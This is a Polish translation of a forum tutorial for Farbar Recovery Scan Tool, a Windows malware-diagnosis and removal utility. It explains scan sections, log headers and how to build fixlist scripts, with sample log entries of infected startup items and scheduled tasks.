Skocz do zawartości

FRST - Tutorial obsługi Farbar Recovery Scan Tool


Rekomendowane odpowiedzi

farbarlogo.png

Farbar Recovery Scan Tool

 

Najnowsza wersja dostępna z autoryzowanych stron:

 

Link 1 | Link 2

 

Farbar Recovery Scan Tool (FRST) jest narzędziem diagnostycznym posiadającym zdolność wykonania przygotowanych skryptów na zainfekowanych przez malware komputerach. Narzędzie działa tak samo dobrze w trybie normalnym jak i awaryjnym, a w przypadku gdy komputer ma problemy z poprawnym uruchomieniem, FRST będzie działać równie efektywnie w Środowisku odzyskiwania Windows (RE).

 

 

**********************************************************

 

 
Informacja o tutorialu

Tutorial powstał na bazie współpracy serwisów BC (Bleeping Computer) i G2G (Geeks to Go) - jego oryginalnym autorem jest emeraldnzl, a treść została skonsultowana z Farbarem. Obecnie emeraldnzl jest na emeryturze, a opieka nad tutorialem i jego aktualizacje są w gestii picasso w konsultacji z Farbarem. Zgoda obojga jest wymagana przed użyciem lub cytowaniem na innych stronach. Uwaga dodatkowa - tutorial ten został oryginalnie utworzony jako zestaw wskazówek dla osób pomagających przy usuwaniu malware na różnych forach.


Tłumaczenia

Francuskie
Hiszpańskie

Holenderskie | Belgijskie

Niemieckie
Polskie
Portugalskie

Rosyjskie

Spis treści

1. Wprowadzenie
2. Domyślne obszary skanowania
3. Skan główny (FRST.txt)

  • Processes (Procesy)
  • Registry (Rejestr)
  • Scheduled Tasks (Zaplanowane zadania)
  • Internet
  • Services (Usługi)
  • Drivers (Sterowniki)
  • NetSvcs
  • One month (Created/Modified) (Jeden miesiąc (utworzone/zmodyfikowane))
  • FLock
  • FCheck
  • KnownDLLs
  • SigCheck
  • Association (Powiązania plików)
  • Restore Points (Punkty Przywracania systemu)
  • Memory info (Statystyki pamięci)
  • Drives (Dyski) i MBR & Partition Table (MBR & Tablica partycji)
  • LastRegBack

4. Skan dodatkowy (Addition.txt)

  • Accounts (Konta użytkowników)
  • Security Center (Centrum zabezpieczeń)
  • Installed Programs (Zainstalowane programy)
  • Custom CLSID (Niestandardowe rejestracje CLSID)
  • Codecs
  • Shortcuts & WMI (Skróty & WMI)
  • Loaded Modules (Załadowane moduły)
  • Alternate Data Streams
  • Safe Mode (Tryb awaryjny)
  • Association (Powiązania plików)
  • Internet Explorer
  • Hosts content (Hosts - zawartość)
  • Other Areas (Inne obszary)
  • MSCONFIG/TASK MANAGER disabled items (MSCONFIG/TASK MANAGER - Wyłączone elementy)
  • FirewallRules (Reguły Zapory systemu Windows)
  • Restore Points (Punkty Przywracania systemu)
  • Faulty Device Manager Devices (Wadliwe urządzenia w Menedżerze urządzeń)
  • Event log errors (Błędy w Dzienniku zdarzeń)
  • Memory info (Statystyki pamięci)
  • Drives (Dyski)
  • MBR & Partition Table (MBR & Tablica partycji)

5. Pozostałe skany opcjonalne

  • List BCD (Lista BCD)
  • SigCheckExt
  • Shortcut.txt
  • 90 Days Files (Pliki z 90 dni)
  • Search Files (Szukaj plików)
  • Search Registry (Szukaj w rejestrze)

6. Dyrektywy/Polecenia

  • CloseProcesses:
  • CMD:
  • Comment:
  • Copy:
  • CreateDummy:
  • CreateRestorePoint:
  • DeleteJunctionsInDirectory:
  • DeleteKey: i DeleteValue:
  • DeleteQuarantine:
  • DisableService:
  • EmptyEventLogs:
  • EmptyTemp:
  • ExportKey: i ExportValue:
  • File:
  • FilesInDirectory: i Folder:
  • FindFolder:
  • Hosts:
  • ListPermissions:
  • Move:
  • Powershell:
  • Reboot:
  • Reg:
  • RemoveDirectory:
  • RemoveProxy:
  • Replace:
  • RestoreFromBackup:
  • RestoreMbr:
  • RestoreQuarantine:
  • SaveMbr:
  • SetDefaultFilePermissions:
  • StartBatch: — EndBatch:
  • StartPowershell: — EndPowershell:
  • StartRegedit: — EndRegedit:
  • Symlink:
  • SystemRestore:
  • Tasksdetails:
  • testsigning on:
  • Unlock:
  • Virusscan:
  • Zip:

Zaufane osoby oraz eksperci, którzy mają odpowiedni dostęp, mogą śledzić na bieżąco postępy przy FRST w wątku dyskusyjnym FRST.

 

 

Edytowane przez picasso
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

frstico.pngWprowadzenie

 

 
Jedną z zalet FRST jest jego prostota. Został zaprojektowany, aby być przyjaznym użytkownikowi. Linie zawierające odniesienia do zainfekowanych obiektów mogą zostać zidentyfikowane, skopiowane z raportu, wklejone do Notatnika i zapisane. Następnie wystarczy nacisnąć przycisk, a narzędzie wykona resztę. Pozwala to na dużą swobodę, gdy tylko pojawi się nowa infekcja, może zostać zidentyfikowana i włączona do fixa.


Obsługiwane systemy

Farbar Recovery Scan Tool jest przeznaczony do pracy na systemach Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10 oraz Windows 11. Są dwie wersje: 32-bit oraz 64-bit.

 

FRST64 nie ma zgodności z systemami XP 64-bit.

 

 


Zakres diagnostyki

FRST tworzy log pokrywający specyficzne obszary systemów Windows, który może być wykorzystany przy początkowej analizie problemu oraz dostarczy określonych informacji o systemie.

Narzędzie jest nieustannie rozwijane, m.in. pod kątem sukcesywnego dodawania kolejnych etykiet identyfikujących nowe formy malware. W związku z tym narzędzie należy regularnie aktualizować. Jeśli komputer jest podłączony do internetu, FRST przy uruchomieniu automatycznie sprawdzi dostępne aktualizacje. Pojawi się komunikat i najnowsza wersja zostanie pobrana.
 
W przypadku wystąpienia nowej infekcji lub niemożności aktualizacji w wyniku braku połączenia z internetem ekspert musi być na bieżąco z nowościami w obszarze infekcji malware, aby dostatecznie wcześnie zlokalizować gdzie leży problem. Przeciętni użytkownicy, przy trudnościach z identyfikacją problemu na komputerze, powinni szukać pomocy u ekspertów.

Domyślnie, podobnie do innych skanerów, FRST stosuje filtrowanie / whitelisting. Pozwala to uniknąć bardzo długich logów. Jeśli jednak chcesz zobaczyć kompleksowy log, to wystarczy, że odznaczysz odpowiednią opcję w sekcji Whitelist. Bądź przygotowany na bardzo długie logi, które mogą wymagać użycia systemu załączników, by się zmieścić.

  • Domyślne wpisy Microsoftu są filtrowane.
  • W przypadku usług i sterowników filtrowanie obejmuje nie tylko domyślne usługi MS, ale także inne legalne (zaufane) usługi i sterowniki.
  • Podpisane cyfrowo pliki wykonywalne Microsoftu są filtrowane na liście One month (Created) / Jeden miesiąc (utworzone).
  • Wejścia powiązane z niepodpisanymi cyfrowo plikami nie są filtrowane.
  • Żaden program zabezpieczający (AV lub Firewall) nie jest ukryty.
  • Sterownik SPTD również nie jest wykluczony.

 


Przygotowanie do uruchomienia

Upewnij się, że FRST jest uruchomiony z uprawnieniami administratora. Narzędzie działa poprawnie tylko wówczas, gdy zostanie uruchomione z uprawnieniami administratora. Jeśli użytkownik nie ma przywilejów administratora, zobaczysz ostrzeżenie w nagłówku FRST.txt.

W niektórych przypadkach program zabezpieczający może uniemożliwić pełne uruchomienie narzędzia. Zasadniczo nie powinno być problemu, ale miej na uwadze taką ewentualność zablokowania programu podczas próby skanowania. Natomiast podczas naprawy zaleca się wyłączenie programów typu Comodo, które mogą uniemożliwić narzędziu wykonanie jego zadania.

Ogólnym zaleceniem w przypadku infekcji rootkit jest podział zadań, lepiej jest wykonywać naprawy pojedynczo i poczekać na wynik przed uruchomieniem kolejnego narzędzia.

Nie jest konieczne tworzenie kopii bezpieczeństwa rejestru. FRST tworzy taką kopię przy pierwszym uruchomieniu. Backup zapisany jest w %SystemDrive%\FRST\Hives (w większości przypadków C:\FRST\Hives). Więcej szczegółów w opisie dyrektywy RestoreFromBackup:.
 
FRST ma wbudowane różne tłumaczenia językowe, w tym polskie mojego autorstwa. Jeśli wynikowe logi są w niezrozumiałym dla danego pomocnika języku, istnieje możliwość wymuszenia raportów w języku angielskim. Wystarczy zmienić nazwę pobranego pliku FRST (FRST.exe lub FRST64.exe) dodając słowo English, np. EnglishFRST.exe / FRSTEnglish.exe lub EnglishFRST64.exe / FRST64English.exe. Wynikowy log będzie całościowo w języku angielskim.
 


Uruchamianie FRST

Instrukcja zaleca użytkownikowi pobranie FRST na Pulpit. Stąd wystarczy dwukrotnie kliknąć ikonę FRST, zaakceptować zrzeczenie się gwarancji i uruchomić. Ikona FRST wygląda następująco:

 

 

frstdeskicon.png

 

 

Należy użyć wersji zgodnej z architekturą systemu użytkownika - wersję 32-bit lub 64-bit. Przy braku pewności w tej kwestii możesz zalecić użytkownikowi pobranie obu i uruchomienie ich. Tylko jedna z nich uruchomi się w systemie, to będzie ta odpowiednia.

 

 

Gdy FRST zostanie już uruchomiony, użytkownik zobaczy konsolę wyglądającą jak ta:

 

frstconsole.png

 

Na polskim systemie zostanie wyświetlony polski interfejs:
 

frstconsolepl.png

 
 
Przykładowa instrukcja do uruchomienia FRST w trybie normalnym:
 
Instrukcje dla użytkowników fixitpc.pl tutaj.
 
Przykładowa instrukcja do uruchomienia FRST na Vista, Windows 7, Windows 8 i Windows 10 w Środowisku odzyskiwania systemu (RE):
 
Instrukcje dla użytkowników fixitpc.pl tutaj.
 
 
Gdy tylko FRST zakończy skan, pliki tekstowe zawierające wyniki skanu zostaną zapisane w tym samym katalogu, z którego został uruchomiony FRST. Podczas pierwszego i kolejnych uruchomień poza Środowiskiem odzyskiwania systemu (RE) są generowane dwa raporty, FRST.txt oraz Addition.txt.

Kopie logów są zapisywane w %SystemDrive%\FRST\Logs (w większości przypadków będzie to C:\FRST\Logs).
 
 
 
Naprawianie

Instrukcje dla użytkowników fixitpc.pl są dostosowywane do konkretnego przypadku
 

Uwaga, bardzo ważne: Farbar Recovery Scan Tool w trybie skanowania jest nieinwazyjny i nie może wyrządzić szkód w komputerze.

Jednakże FRST jest także bardzo efektywny w wykonywaniu podanych mu instrukcji. Podczas stosowania naprawy (Fix), jeśli zostanie poinstruowany aby usunąć jakiś obiekt, w 99% przypadków to zrobi. I chociaż są pewne wbudowane zabezpieczenia, ich zakres i konstrukcja nie mogą wchodzić w interferencję z usuwaniem infekcji. Użytkownik musi być świadom tego. Niewłaściwie użyte narzędzie (np. poproszone o usunięcie ważnych plików) może sprawić, że system nie wstanie.

Jeśli nie jesteś pewien odnośnie jakiegoś wpisu w raporcie FRST, zawsze zwracaj się do eksperta, który pomoże przygotować skrypt.

 

 

FRST posiada wachlarz poleceń i przełączników, które mogą zostać użyte zarówno do manipulowania procesami komputera, jak i do naprawy zidentyfikowanych problemów.
 
 

 



 
Przygotowanie Fixlist:
 
1. Metoda z fixlist.txt - Aby naprawić znalezione problemy, skopiuj linie z raportów FRST i wklej do nowego pliku tekstowego pod nazwą fixlist.txt, zapisanego w tym samym folderze z którego jest uruchamiane narzędzie.

 

Istotne jest użycie Notatnika. Skrypt naprawy nie zadziała, jeśli zostanie użyty Word lub inny program.


 
2. Metoda z Ctrl+y - FRST posiada skrót klawiaturowy do automatycznego generowania i otwierania pustego pliku do wypełnienia. Uruchom FRST, wciśnij kombinację Ctrl+y by otworzyć plik, wklej skrypt naprawy, wciśnij Ctrl+s by zapisać zmiany.

 

 

3. Metoda ze schowkiem systemowym -  Wstaw linie przenaczone do naprawy pomiędzy oznaczenia Start:: i End:: jak podane poniżej:

 

Start::
zawartość skryptu
End::

 

Zaleć użytkownikowi skopiowanie całej treści, włącznie ze Start:: i End::, a następnie kliknięcie przycisku Napraw (Fix) w oknie FRST.
 

 



 
Unicode (kodowanie znaków):

 

Przetwarzanie wpisów zawierających znaki Unicode wymusza konieczność zapisania również i skryptu w Unicode, w przeciwnym przypadku znaki Unicode zostaną utracone.


 
Skrót Ctrl+y automatycznie zapisuje plik tekstowy w Unicode. Ale jeśli plik fixlist.txt jest tworzony ręcznie, odpowiednie kodowanie musi być wybrane w Notatniku (jak pokazane poniżej).

Przykład:

 

S2 楗敳潂瑯獁楳瑳湡t; 㩃停潲牧浡䘠汩獥⠠㡸⤶坜獩履楗敳䌠牡⁥㘳尵潂瑯楔敭攮數 [X]
ShortcutWithArgument: C:\Users\Public\Desktop\Gооglе Сhrоmе.lnk -> C:\Users\User\AppData\Roaming\HPRewriter2\RewRun3.exe (QIIXU APZEDEEMFA) -> 1 0 <===== Cyrillic
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Google Chrome.lnk.bat

 

Skopiuj i wklej wpisy do otwartego Notatnika, wybierz "Zapisz jako", jako Kodowanie: wybierz UTF-8, wprowadź nazwę fixlist i zapisz.


Przy zapisie standardowym z pominięciem wyboru UTF-8 Notatnik ostrzeże o utracie znaków. Jeśli mimo to będziesz kontynuował i zapiszesz plik, po zamknięciu i ponownym otwarciu otrzymasz:

 

S2 ????????t; ??????????????????????????? [X]
C:\Users\Public\Desktop\G??gl? ?hr?m?.lnk
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Google Chrome.lnk.bat

 

I FRST nie będzie w stanie przetworzyć wpisów.
 

 



 
Zmanipulowana nazwa użytkownika:
 
Niektórzy użytkownicy zniekształcają zawartość logów poprzez usunięcie lub podmianę nazwy użytkownika. By zagwarantować przetworzenie poprawnych ścieżek dostępu, możesz podmienić w ścieżkach dostępu potencjalnie zmanipulowane nazwy użytkownika słowem kluczowym CurrentUserName (dla zalogowanego użytkownika) lub AllUserName (dla wszystkich użytkowników). FRST automatycznie przetłumaczy te słowa kluczowe na odpowiednią nazwę użytkownika.

 

 

CurrentUserName nie jest obsługiwane w Środowisku odzyskiwania systemu (RE).

 

 

 

 



 
By zapobiec zawieszeniu FRST na wiele godzin na skutek błędów skryptów, czas wykonania dyrektyw cmd: i Powershell: jest ograniczony do 60 minut.
 
Elementy przeniesione przez skrypt naprawy są przechowywane w %SystemDrive%\FRST\Quarantine, w większości przypadków będzie to C:\FRST\Quarantine, do momentu wyczyszczenia i usunięcia FRST.

Po szczegółowe informacje o sposobie przygotowania skryptów napraw zajrzyj do poniższych sekcji.

 

 

 

 

Usuwanie FRST

 

By usunąć wszystkie pliki/foldery utworzone przez FRST oraz narzędzie jako takie, zmień nazwę pliku FRST/FRST64.exe na uninstall.exe i uruchom ten plik. Procedura wymaga restartu i działa tylko poza Środowiskiem odzyskiwania systemu (RE).

 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngDomyślne obszary skanowania

 
Podczas każdego uruchomienia poza Środowiskiem odzyskiwania systemu (RE) są generowane dwa raporty, FRST.txt oraz Addition.txt. Log Addition.txt nie jest generowany, gdy FRST jest uruchomiony w Środowisku odzyskiwania systemu (RE).


Skan uruchomiony w trybie normalnym:

 

 

Skan główny

Processes (Procesy) [weryfikacja podpisów cyfrowych]
Registry (Rejestr) [weryfikacja podpisów cyfrowych]

Scheduled Tasks (Zaplanowane zadania) [weryfikacja podpisów cyfrowych]
Internet [weryfikacja podpisów cyfrowych]
Services (Usługi) [weryfikacja podpisów cyfrowych]
Drivers (Sterowniki) [weryfikacja podpisów cyfrowych]
NetSvcs
One month (Created) (Jeden miesiąc (utworzone)) [weryfikacja podpisów cyfrowych Microsoftu]
One month (Modified) (Jeden miesiąc (zmodyfikowane))
Files in the root of some directories (Pliki w katalogu głównym wybranych folderów)

FLock
FCheck
SigCheck [weryfikacja podpisów cyfrowych]
LastRegBack

Skan dodatkowy

Accounts (Konta użytkowników)
Security Center (Centrum zabezpieczeń)
Installed Programs (Zainstalowane programy)

Custom CLSID (Niestandardowe rejestracje CLSID) [weryfikacja podpisów cyfrowych]

Codecs [weryfikacja podpisów cyfrowych]

Shortcuts & WMI (Skróty & WMI)
Loaded Modules (Załadowane moduły) [weryfikacja podpisów cyfrowych]
Alternate Data Streams
Safe Mode (Tryb awaryjny)
Association (Powiązania plików)
Internet Explorer [weryfikacja podpisów cyfrowych]
Hosts content (Hosts - zawartość)
Other Areas (Inne obszary)
MSCONFIG/TASK MANAGER disabled items (MSCONFIG/TASK MANAGER - Wyłączone elementy)
FirewallRules (Reguły Zapory systemu Windows) [weryfikacja podpisów cyfrowych]
Restore Points (Punkty Przywracania systemu)
Faulty Device Manager Devices (Wadliwe urządzenia w Menedżerze urządzeń)
Event log errors (Błędy w Dzienniku zdarzeń)
Memory info (Statystyki pamięci)
Drives (Dyski)
MBR & Partition Table (MBR & Tablica partycji)

Skany opcjonalne

List BCD (Lista BCD)
SigCheckExt [weryfikacja podpisów cyfrowych]
Shortcut.txt
Addition.txt
90 Days Files (Pliki z 90 dni)

 

Search Files (Szukaj plików) [weryfikacja podpisów cyfrowych]

Search Registry (Szukaj w rejestrze)

 

 

Pliki pozbawione podpisu cyfrowego lub z niezweryfikowanym podpisem cyfrowym zostaną oznaczone etykietą [Brak podpisu cyfrowego] / [File not signed].


 
 
Skan uruchomiony w Środowisku odzyskiwania systemu (RE):

 

 

Skan główny

Registry (Rejestr)

Scheduled Tasks (Zaplanowane zadania)
Services (Usługi)
Drivers (Sterowniki)
NetSvcs
One month (Created) (Jeden miesiąc (utworzone))
One month (Modified) (Jeden miesiąc (zmodyfikowane))
FCheck
KnownDLLs
SigCheck
Association (Powiązania plików)
Restore Points (Punkty Przywracania systemu)
Memory info (Statystyki pamięci)
Drives (Dyski)
MBR & Partition Table (MBR & Tablica partycji)
LastRegBack

 

Skany opcjonalne

List BCD (Lista BCD)
90 Days Files (Pliki z 90 dni)

 

Search Files (Szukaj plików)

 

 

Weryfikacja podpisów cyfrowych nie jest dostępna z poziomu Środowiska odzyskiwania systemu (RE).

 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngSkan główny (FRST.txt)

 

 

Nagłówek

Poniżej przykładowy nagłówek:
 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-08-2023
Ran by User (administrator) on DESKTOP-3DJ40NK (Dell Inc. Inspiron 7352) (03-09-2023 22:20:17)
Running from C:\Users\User\Desktop\FRST64.exe
Loaded Profiles: User
Platform: Windows 10 Pro Version 22H2 19045.3324 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal

 
W polskiej wersji:
 

Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 28-08-2023
Uruchomiony przez NazwaUżytkownika (administrator)  DESKTOP-3DJ40NK (Dell Inc. Inspiron 7352) (03-09-2023 22:20:17)
Uruchomiony z C:\Users\NazwaUżytkownika\Desktop\FRST64.exe
Załadowane profile: NazwaUżytkownika (Dostępne profile: NazwaUżytkownika & Administrator)
Platforma: Windows 10 Pro Wersja 22H2 19045.3324 (X64) Język: Polski (Polska)
Domyślna przeglądarka: FF
Tryb startu: Normal


Informacje z nagłówka mogą być pomocne:

  • Pierwsza linia wskazuje czy program został uruchomiony w wariancie 32-bit czy 64-bit. Numer wersji FRST również jest pokazany. Numer wersji jest szczególnie ważny. Stara wersja może nie mieć najnowszej funkcjonalności.
  • Druga linia pokazuje jaki użytkownik uruchomił narzędzie i z jakimi uprawnieniami. Może to być ostrzeżenie, czy użytkownik ma odpowiednie uprawnienia. Ta linia pokazuje także nazwę komputera oraz producenta i model systemu (o ile dostępne). Data i czas uruchomienia narzędzia są pomocne przy rozpoznawaniu staszego raportu omyłkowo dostarczonego przez użytkownika.
  • Trzecia linia mówi skąd został uruchomiony FRST. Jeśli został uruchomiony z innego miejsca niż Pulpit, może mieć to znaczenie przy instrukcjach naprawczych.
  • Czwarta linia informuje które konto użytkownika jest zalogowane, czyli które gałęzi rejestru użytkownika zostały załadowane (ntuser.dat i UsrClass.dat).
  • Piąta linia rejestruje edycję platformy Windows, w tym główne aktualizacje (Wersja i kompilacja Windows 11 i Windows 10, "Update" Windows 8.1, dodatek Service Pack Windows 7 i starszych), oraz używany język. Brak najświeższych aktualizacji głównych może być ostrzeżeniem odnośnie potencjalnych problemów aktualizacji.
  • Szósta linia podaje domyślną przeglądarkę.
  • Siódma linia mówi w jakim trybie został wykonany skan.
  • Ostatnią pozycją jest link do oficjalnego tutoriala.

 

Odnośnie linii numer cztery: W przypadku większej ilości załadowanych kont (tzn. przełączanych przy udziale opcji "Przełącz użytkownika" lub "Wyloguj") FRST pokaże wszystkie te konta w "Załadowanych profilach" oraz powiązane z nimi wpisy rejestru. Inne niezaładowane konta nie zostaną wyliczone w "Załadowanych profilach", ale FRST automatycznie podmontuje ich gałęzie rejestru (tylko ntuser.dat) do skanu Rejestru.

 

Nagłówek raportu utworzonego z poziomu Środowiska odzyskiwania systemu (RE) wygląda podobnie, z wyłączeniem informacji "Loaded Profile" / "Załadowane profile", gdyż w RE nie są załadowane standardowe profile kont użytkowników.


 
 
 
Ostrzeżenia które mogą się pojawić w nagłówku:

W przypadku problemów ze startem możesz zobaczyć coś podobnego do:

 

ATTENTION: Could not load system hive.

 

UWAGA: Nie można załadować gałęzi System.


To informacja o braku gałęzi "system" rejestru. Potencjalnym rozwiązaniem jest przywrócenie gałęzi przy użyciu techniki LastRegBack: (patrz dalej).

 

Default: ControlSet001

 

Domyślne: ControlSet001


To informacja która z gałęzi CS (ControlSet) jest bieżącą w systemie. W normalnych okolicznościach wiadomość nie jest kluczowa, o ile nie wchodzą w grę przypadki zaawansowanych ręcznych operacji na konfiguracji, która zostanie załadowana podczas następnego bootowania Windows. Na podstawie tej informacji będzie wiadomym która z gałęzi CS jest odpowiednią do edycji. Modyfikacje w innych kopiach CS niż bieżąca nie mają żadnego efektu w systemie.
 
 
.
Processes
Uruchomione procesy
 

(cmd.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <8>

 

Jeśli proces jest uruchomiony przez inny proces, (process nadrzędny ->) zostanie wyliczony.

<numer> figurujący na końcu linii oznacza wielokrotne wystąpienia tego samego procesu.

 

Zatrzymywanie uruchomionego procesu może mieć dwa uzasadnienia: wstrzymanie pracy poprawnego procesu pod kątem ewentualnej interferencji z naprawą lub zatrzymanie szkodliwego procesu w celu usunięcia powiązanego pliku / folderu.

Aby zatrzymać proces dodaj odpowiednią linię ze skanu FRST. W pliku Fixlog.txt zostanie nagrany odpowiedni rekord z etykietą Nazwa procesu => process closed successfully / proces pomyślnie zamknięty

W przypadku szkodliwego procesu usuwanie skojarzonego z nim pliku lub katalogu wymaga załączenia każdego elementu z osobna.

 


 
Registry
Skan rejestru
 
FRST posiada bardzo skuteczny algorytm usuwania kluczy i wartości rejestru. Wszystkie oporne obiekty, zablokowane przy udziale niedostatecznych uprawnień lub znaków null, zostaną skasowane. Klucze zwracające odmowę dostępu zostaną zaplanowane do usunięcia przy restarcie. Jedyne klucze, które nie zostaną usunięte, to klucze nadal chronione przez aktywny sterownik poziomu kernel. Ten szczególny typ kluczy/wartości powinien zostać usunięty dopiero po zdjęciu aktywności sterownika kernel poprzez jego usunięcie lub wyłączenie.
 
Skopiowanie elementów z raportu do skryptu naprawczego spowoduje uruchomienie jednej z dwóch akcji FRST na danym kluczu/wartości rejestru:

  • Przywrócenie domyślnej postaci
  • Usunięcie obiektu

 

BootExecute, wartości Winlogon (Userinit, Shell, System), LSA, AppInit_DLLs - elementy skopiowane do fixlist zostaną zresetowane do domyślnych wartości Windows.
 

W przypadku wielościeżkowej wartości AppInit_DLLs, gdy tylko jedna ze ścieżek jest szkodliwa, przetworzenie jej za pomocą FRST nie naruszy pozostałych.


Nie ma potrzeby wykonania żadnych alternatywnych napraw. To samo odnosi się do niektórych pozostałych istotnych kluczy/wartości, które mogą zostać zmodyfikowane przez malware.

 

FRST nie rusza plików, które są ładowane lub uruchamiane z kluczy rejestru. Pliki do usunięcia, wraz pełną ścieżką bez jakichkolwiek dodatkowych informacji, muszą być wypisane osobno.

 


Run, RunOnce, Image File Execution Options i pozostałe - wpisy skopiowane do fixlist zostaną usunięte z rejestru. Uruchamiane powiązane pliki nie zostaną usunięte. Jeśli chcesz je usunąć, musisz dodać odpowiednie wpisy osobno. Aby usunąć szkodliwy wpis Run razem z plikiem, wpisujesz je w pliku fixlist następująco (pierwsza linia skopiowana bezpośrednio z raportu):

 

HKLM\...\RunOnce: [LT1] => C:\WINDOWS\TEMP\gA652.tmp.exe [216064 2019-04-13] () [File not signed] [Brak podpisu cyfrowego] <==== ATTENTION [UWAGA]
C:\WINDOWS\TEMP\gA652.tmp.exe

 
Startup - wejścia się ujawniają, gdy FRST wykryje plik lub skrót w folderze Startup (Autostart). Jeśli plik jest skrótem, druga linia wylistuje element docelowy skrótu (czyli plik wykonywalny uruchamiany ze skrótu). W celu usunięcia zarówno skrótu jak i pliku docelowego należy załączyć oba wejścia. Przykład:

 

Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2019-03-25]
ShortcutTarget: helper.lnk -> C:\Users\User\AppData\Roaming\WindowsServices\helper.vbs () [File not signed] [Brak podpisu cyfrowego]

 

Pierwsza linia usuwa skrót. Druga usuwa plik helper.vbs. Załączenie tylko drugiej linii spowoduje wprawdzie usunięcie pliku wykonywalnego, lecz z pozostawieniem skrótu w katalogu Startup. Przy następnym uruchomieniu systemu ów skrót, próbujący uruchamiać już nieistniejący program, wygeneruje błąd.

 

 

FRST wykrywa przekierowania folderów Startup (użytkownika i globalne). Przykład:

 

StartupDir: C:\Users\User\AppData\Local\Temp\b64c58644b\  <==== ATTENTION [UWAGA]

 

By naprawić usterkę załącz linię w fixlist a FRST przywróci domyślną ścieżkę dostępu.


 
Ograniczenia
 
W przypadku malware wykorzystującego technikę Niezaufanych certyfikatów (Untrusted Certificates) lub Zasad zabezpieczeń lokalnych (Software Restriction Policies) zobaczysz linie podobne do tych:

 

HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION [UWAGA]

 

HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <==== ATTENTION [UWAGA]


By odblokować programy zabezpieczające, załącz linie tego rodzaju w fixlist.
 

Detekcja Zasad zabezpieczeń lokalnych jest ogólna i może skutkować oznaczaniem poprawnych wejść stworzonych w celu zabezpieczenia przed infekcjami. Zobacz: How to manually create Software Restriction Policies to block ransomware.


 
FRST wykrywa również Obiekty Zasady grupy (Group Policy Objects) takie jak Registry.pol i Scripts, które mogą być wykorzystywane przez malware. Ograniczenia Firefox, Google Chrome, Edge oraz Windows Defender zlokalizowane w pliku Registry.pol zostaną zaraportowane z osobna:
 

GroupPolicy: Restriction - Windows Defender <==== ATTENTION

 

GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA

 
Dla innych ograniczeń i skryptów otrzymasz jednak tylko ogólne powiadomienie bez żadnych szczegółów:
 

GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicyScripts: Restriction <==== ATTENTION

 

GroupPolicy: Ograniczenia ? <==== UWAGA
GroupPolicyScripts: Ograniczenia <==== UWAGA


By zresetować Zasady grupy, załącz linie w fixlist. FRST opróżni foldery GroupPolicy i wymusi restart systemu. Przykład:

 

C:\Windows\system32\GroupPolicy\Machine => moved successfully [pomyślnie przeniesiono]
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully [pomyślnie przeniesiono]

 

Ta detekcja jest przystosowana dla standardowego domowego komputera z nieskonfigurowanymi Zasadami grupy i może skutkować oznaczaniem poprawnych wpisów wprowadzonych ręcznie via gpedit.msc.


.

 

Scheduled Tasks
Zaplanowane zadania

Załączenie wpisu w fixlist spowoduje usunięcie zadania jako takiego. Przykład:
 

Task: {A0DC62F9-8007-4B9C-AAA2-0AB779246E27} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4925952 2019-03-19] () [File not signed] [Brak podpisu cyfrowego] <==== ATTENTION [UWAGA]

 

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => removed successfully [pomyślnie usunięto]
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => removed successfully [pomyślnie usunięto]
C:\Windows\System32\Tasks\csrss => moved successfully [pomyślnie przeniesiono]
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully [pomyślnie usunięto]

 

Co istotne, FRST usuwa tylko wpisy w rejestrze oraz plik zadania, ale nie usuwa powiązanego pliku wykonywalnego. W przypadku, gdy plik wykonywalny jest szkodliwy, powinien zostać dodany w osobnej linii do fixlist w celu usunięcia.

 

Malware może użyć do uruchomienia własnego pliku autoryzowanego programu, np. sc.exe do uruchamiania własnych usług. Przed podjęciem akcji należy się upewnić, czy program wykonywalny jest autoryzowany, czy wręcz przeciwnie.

 

 

Następująca linia nie powinna być załączana w fixlist:

 

"{Losowy GUID}" => key was unlocked. <==== ATTENTION

 

"{Losowy GUID}" => klucz został odblokowany. <==== UWAGA

 

Komunikat oznacza, że FRST automatycznie naprawił uszkodzone uprawnienia już podczas skanu. Powinien zostać wygenerowany nowy log FRST, by sprawdzić czy odblokowane zadanie jest widoczne (niestandardowe zadanie) czy też nie (filtrowane wejście Microsoftu). Jeśli potrzebne, załącz standardową linię zadania w fixlist.

 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngSkan główny (FRST.txt)

 
 
Internet

Poza kilkoma wyjątkami, elementy skopiowane do fixlist zostaną usunięte. Jeżeli wejście rejestru jest skorelowane z plikami/folderami, powiązane pliki/foldery muszą zostać skopiowane osobno do skryptu naprawczego. Nie dotyczy wejść przeglądarek, sięgnij po poniższe opisy po więcej szczegółów.



Winsock

W przypadku załączenia do naprawy wpisu kategorii Catalog5 FRST przeprowadzi jedną z dwóch akcji:

  • Domyślne wejścia szkodliwie zmodyfikowane zostaną przywrócone do domyślnej postaci.
  • Niestandardowe wejścia zostaną usunięte, a ilość wejść w katalogu przeliczona ponownie.

